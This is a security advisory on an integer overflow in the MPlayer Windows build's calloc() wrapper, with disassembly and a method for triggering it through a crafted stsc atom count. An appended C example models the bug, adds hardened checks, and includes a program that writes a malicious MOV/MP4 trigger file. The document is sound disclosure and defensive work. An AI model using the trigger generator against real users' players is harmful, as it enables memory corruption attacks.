#######################################################################

                             Luigi Auriemma

Application:  MPlayer on Windows
              http://oss.netfarm.it/mplayer-win32.php
              http://www.mplayerhq.hu
Versions:     <= r33883 4.2.5
Platforms:    Windows build only
Bug:          integer overflow
Exploitation: local and remote
Date:         02 Sep 2011 (found 02 Jun 2011)

Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"MPlayer on Windows" is the official win32 build of the well-known
mplayer software (http://www.mplayerhq.hu), and this binary is used by
all the Windows projects and GUIs based on it, such as SMPlayer.

#######################################################################

======
2) Bug
======

Due to some compatibility problems with the compiler, mplayer on Windows
uses some "wrapped" allocation functions. One of them is the calloc()
replacement, which doesn't protect against integer overflow
vulnerabilities because it uses a 32-bit multiplication to calculate the
size of the memory to allocate: nmemb * size is computed with IMUL, and
the truncated product is what gets passed to the malloc wrapper at
01017FB3 and then reused as the length argument of the following call:

  010181D5 /$ 55                 PUSH EBP
  010181D6 |. 89E5               MOV EBP,ESP
  010181D8 |. 83EC 28            SUB ESP,28
  010181DB |. 8B45 08            MOV EAX,DWORD PTR SS:[EBP+8]
  010181DE |. 0FAF45 0C          IMUL EAX,DWORD PTR SS:[EBP+C]
  010181E2 |. 8945 F8            MOV DWORD PTR SS:[EBP-8],EAX
  010181E5 |. C74424 04 10000000 MOV DWORD PTR SS:[ESP+4],10
  010181ED |. 8B45 F8            MOV EAX,DWORD PTR SS:[EBP-8]
  010181F0 |. 890424             MOV DWORD PTR SS:[ESP],EAX
  010181F3 |. E8 BBFDFFFF        CALL mplayer.01017FB3
  010181F8 |. 8945 FC            MOV DWORD PTR SS:[EBP-4],EAX
  010181FB |. 8B45 F8            MOV EAX,DWORD PTR SS:[EBP-8]
  010181FE |. 894424 08          MOV DWORD PTR SS:[ESP+8],EAX
  01018202 |. C74424 04 00000000 MOV DWORD PTR SS:[ESP+4],0
  0101820A |. 8B45 FC            MOV EAX,DWORD PTR SS:[EBP-4]
  0101820D |. 890424             MOV DWORD PTR SS:[ESP],EAX
  01018210 |. E8 EB310100        CALL
  01018215 |. 8B45 FC            MOV EAX,DWORD PTR SS:[EBP-4]
  01018218 |. C9                 LEAVE
  01018219 \. C3                 RETN

The resulting integer overflow can be exploited in various ways, because
some versions ago mplayer adopted calloc() and removed many of the
previous inline size checks, precisely because calloc() is supposed to
catch this kind of multiplication overflow by itself.

The original source code of the wrapped functions used in the win32
build is available here:

  http://oss.netfarm.it/mplayer/misc/yy_alt_alloc.diff

Note that the original mplayer code doesn't use this modification, so it
is not vulnerable: the bug affects specifically the MPlayer on Windows
builds.

#######################################################################

===========
3) The Code
===========

The problem can be replicated in tons of ways. One of them is taking a
MOV/MP4 file, searching for the "stsc" atom and placing the bytes
10 00 00 01 (0x10000001 in big endian) 8 bytes after it, overwriting the
existing ones (the 4 bytes in between are the atom's version/flags
field; the overwritten dword is the atom's 32-bit big-endian entry
count).

#######################################################################

======
4) Fix
======

The author of the win32 port was contacted a couple of months ago but
there is no fix yet.

#######################################################################
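The following is an added example written for this page; it is not code from the advisory above, nor from the MPlayer project or its win32 port. It serves sections 2 and 3 together: it models the wrapped calloc() of section 2 (the product of two 32-bit operands, truncated exactly as the IMUL above truncates it) next to a replacement that rejects the overflow, adds the length check a demuxer should perform on the atom itself, and applies section 3's trigger to an in-memory copy of a MOV/MP4 file. All function names are mine. The 16-byte element size used to show the wrap is an assumption chosen only for illustration; the page does not state the in-memory size of mplayer's stsc entry. The 12-byte on-disk stsc entry (three 32-bit fields) is part of the MOV format, not an assumption.

```c
/* Added example, not code from the advisory or from the MPlayer/win32 port.
 * It models the wrapped calloc() from section 2 (IMUL of two 32-bit operands,
 * truncated product), shows a replacement that rejects the overflow, and
 * applies section 3's trigger to an in-memory copy of a MOV/MP4 file.
 * ASSUMPTIONS: the 16-byte element size used below is chosen only to make the
 * wrap visible; the page does not state the real size of mplayer's stsc entry.
 * The 12-byte ON-DISK stsc entry (three 32-bit fields) is the MOV format. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size the vulnerable wrapper passes to its malloc(): nmemb*size computed in
 * 32 bits, so 0x10000001 * 16 = 0x100000010 becomes 0x10 (16 bytes). */
uint32_t wrapped_calloc_size(uint32_t nmemb, uint32_t size)
{
    return nmemb * size;                /* wraps modulo 2^32, like IMUL */
}

/* Hardened replacement: fail (NULL, errno=ENOMEM) when nmemb*size does not
 * fit in size_t instead of silently allocating the truncated amount. */
void *checked_calloc(size_t nmemb, size_t size)
{
    if (nmemb != 0 && size > SIZE_MAX / nmemb) {
        errno = ENOMEM;
        return NULL;
    }
    size_t total = nmemb * size;
    void *p = malloc(total ? total : 1);
    if (p)
        memset(p, 0, total);
    return p;
}

/* Demuxer-side sanity check independent of any allocator: an stsc atom of
 * atom_size bytes (8-byte header, 4 bytes version/flags, 4-byte count) can
 * hold at most (atom_size-16)/12 entries, so a larger count is a lie. */
int stsc_count_is_sane(uint32_t atom_size, uint32_t count)
{
    if (atom_size < 16)
        return 0;
    return count <= (atom_size - 16) / 12;
}

/* Section 3's trigger: find the first "stsc" fourcc and overwrite the 32-bit
 * big-endian entry count that sits 8 bytes after it (4 bytes of version/flags
 * are in between). Returns the offset of "stsc", or -1 if not present. */
long patch_stsc_count(unsigned char *buf, size_t len, uint32_t count)
{
    for (size_t i = 0; i + 12 <= len; i++) {
        if (memcmp(buf + i, "stsc", 4) != 0)
            continue;
        buf[i + 8]  = (unsigned char)(count >> 24);
        buf[i + 9]  = (unsigned char)(count >> 16);
        buf[i + 10] = (unsigned char)(count >> 8);
        buf[i + 11] = (unsigned char)(count);
        return (long)i;
    }
    return -1;
}

/* Stand-alone use: ./stsc_poc in.mov out.mov writes the patched copy. */
int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s in.mov out.mov\n", argv[0]);
        return 1;
    }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 1; }
    fseek(f, 0, SEEK_END);
    long n = ftell(f);
    rewind(f);
    unsigned char *buf = malloc(n > 0 ? (size_t)n : 1);
    if (!buf || n < 0 || fread(buf, 1, (size_t)n, f) != (size_t)n) {
        perror("read");
        return 1;
    }
    fclose(f);
    long off = patch_stsc_count(buf, (size_t)n, 0x10000001u);
    if (off < 0) {
        fprintf(stderr, "no stsc atom in %s\n", argv[1]);
        return 1;
    }
    printf("patched count at offset %ld; wrapped 32-bit size for 16-byte "
           "entries = %u bytes\n", off + 8, wrapped_calloc_size(0x10000001u, 16));
    f = fopen(argv[2], "wb");
    if (!f || fwrite(buf, 1, (size_t)n, f) != (size_t)n) { perror(argv[2]); return 1; }
    fclose(f);
    free(buf);
    return 0;
}
```

Build with `cc -o stsc_poc stsc_poc.c` and run it on any MOV/MP4 to get the patched copy described in section 3. Two separate defences are shown on purpose: `checked_calloc` fixes the allocator, which is what the win32 port needs, while `stsc_count_is_sane` is the check a demuxer should apply before calling any allocator at all, because a count that cannot fit in the atom is bogus even where calloc() is correct and the allocation would merely fail.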